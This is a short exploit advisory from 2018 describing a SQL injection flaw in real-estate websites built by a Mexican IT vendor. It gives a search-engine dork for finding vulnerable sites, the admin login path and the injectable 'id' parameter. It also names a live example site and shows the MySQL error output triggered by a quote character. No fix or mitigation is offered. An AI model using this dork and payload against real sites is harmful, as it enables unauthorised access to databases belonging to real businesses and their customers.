#################################################################################################
# Exploit Title : Desarrollado por Kodfee Constultores IT. Mexico SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : kodfee.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Desarrollado por Kodfee - Constultores IT. ''
# Admin Login Path => /index.php?seccion=login
# Exploit : /index.php?seccion=detallePropiedad&id=[SQL Injection]
#################################################################################################
# Example Site => solfine.mx/index.php?seccion=detallePropiedad&id=23%27 => [ Proof of Concept ] => archive.is/FxKMv
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where =23'' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where =23'' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and idMunicipio= and idColonia=' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and idMunicipio=' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################